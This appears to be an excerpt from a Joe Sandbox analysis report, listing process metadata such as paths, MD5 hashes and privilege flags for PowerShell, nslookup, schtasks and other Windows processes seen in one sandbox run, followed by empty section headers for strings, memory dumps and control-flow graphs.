Start date: | 30/09/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 1 |
Start time: | 12:58:17 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 3 |
Start time: | 12:58:19 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff789650000 |
File size: | 22'528 bytes |
MD5 hash: | 2F46799D79D22AC72C241EC0322B011D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 4 |
Start time: | 12:58:22 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\nslookup.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74a710000 |
File size: | 89'600 bytes |
MD5 hash: | F2E3950C1023ACF80765C918791999C0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 5 |
Start time: | 12:58:22 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\nslookup.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74a710000 |
File size: | 89'600 bytes |
MD5 hash: | F2E3950C1023ACF80765C918791999C0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 7 |
Start time: | 12:58:24 |
Start date: | 30/09/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c4390000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 12:58:24 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 12:58:24 |
Start date: | 30/09/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c4390000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 12:58:26 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 12:58:28 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c2250000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 12:58:28 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\schtasks.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6effe0000 |
File size: | 235'008 bytes |
MD5 hash: | 76CD6626DD8834BD4A42E6A565104DC2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 12:58:29 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 14 |
Start time: | 12:58:29 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 15 |
Start time: | 12:58:33 |
Start date: | 30/09/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Has exited: | true |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFAAC560004 Relevance: .4, Instructions: 391COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFAAC4948E0 Relevance: .3, Instructions: 255COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFAAC5600DD Relevance: .1, Instructions: 139COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFAAC4937B5 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 1.6% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 8 |
Total number of Limit Nodes: | 1 |
Graph
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFAAC48CA90 Relevance: .3, Instructions: 329COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFAAC48D4F9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 242fileCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFAAC5515DD Relevance: .7, Instructions: 673COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|